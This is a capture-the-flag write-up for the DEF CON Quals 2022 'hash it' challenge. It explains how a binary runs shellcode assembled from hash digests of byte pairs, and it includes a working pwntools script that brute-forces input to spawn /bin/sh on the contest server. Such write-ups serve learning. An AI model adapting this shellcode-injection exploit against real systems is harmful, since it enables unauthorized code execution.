Page MenuHomedesp's stash
Files F374810

defconquals22.md
No OneTemporary
Actions

defconquals22.md
View Options

### hash it
literally the only "normal" chall in this ctf lmfao all of the other ones are obscure architectures, weird custom implementations, way too new versions for existing tooling to support it yadayada
(ok maybe aside from not too advanced but still)
either way x86-64 ELF, reads in 4 bytes for malloc then reads in the amount of bytes specfified as data
does some hashing with an pointer array for 4 algorithms, then ends up jumping to the malloc'd address which is rwx'd
looking closer at the read loops, turns out its reading 2 bytes at a time then hash it with the rotating algorithms and fetching 1 byte from it to construct the shellcode to jump to
quickly wrote a reimplementation in python to check if its really just that, which ended up matching every byte aside from the first byte
turns out it was the newline char from me using the console manually lmao
either way with that since we are only dealing with pairs of bytes a good ol brute force would work for constructing the wanted shellcode
with some wackiness out of the way like using the wrong architecture for shellcode (oops) we can get a shell pretty easily
```py
from pwn import *
from Crypto.Hash import MD5, SHA1, SHA256, SHA512
payload = b''
algos = [MD5, SHA1, SHA256, SHA512]
#dont forget to set context or else you get 32 bits :)
context.binary = ELF('./zc7ejjq9ehhcqj1x61ekoa8pjtk7')
targetshellcode = asm(shellcraft.sh())
# targetshellcode = b'jhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05'
print(targetshellcode)
for i in range(0, len(targetshellcode)*2, 2):
for test in range(0xFFFF):
pair = int.to_bytes(test, byteorder='little', length=2)
algo = algos[(i // 2 % 4)]
h = algo.new()
h.update(pair)
if h.digest()[0] == targetshellcode[i//2]:
payload += pair
print(payload)
break
print('final:', payload)
# payload = b'I\x00\x03\x00n\x00\x13\x00\xc2\x00\x80\x00\x11\x03[\x01\xc2\x006\x00<\x01\xea\x02x\x00\xf4\x01Z\x00r\x00\x88\x00<\x00\x11\x03A\x00n\x01\x8d\x00\x9a\x00\x84\x00n\x01\xc5\x00u\x00A\x00]\x00\xc3\x01C\x04U\x01\x90\x00\t\x01n\x00A\x00\xb7\x00\xdb\x00n\x00\x12\x00\xb7\x00\xd5\x01=\x01U\x01\xef\x00X\x02b\x01\x0e\x00'
#remote
p = remote('hash-it-0-m7tt7b7whagjw.shellweplayaga.me', 31337)
p.recvuntil('Ticket please:')
p.sendline(r'ticket{GangwayBoom2757n22:JPhP0TDldX6nhNGrjRYeXtC4eCTXxx6HWFyb8oUl55JtIl0M}')
#local
# p = process([context.binary.path])
# import time
# time.sleep(10)
p.send(int.to_bytes(len(payload), byteorder='big', length=4))
p.send(payload)
p.interactive()
```

File Metadata

Mime Type
text/x-python
Expires
Mon, Aug 4, 9:32 PM (20 h, 17 m)
Storage Engine
local-disk
Storage Format
Raw Data
Storage Handle
10/75/d03ea002edd041797280b1fc5f97

Event Timeline

Back to Main Site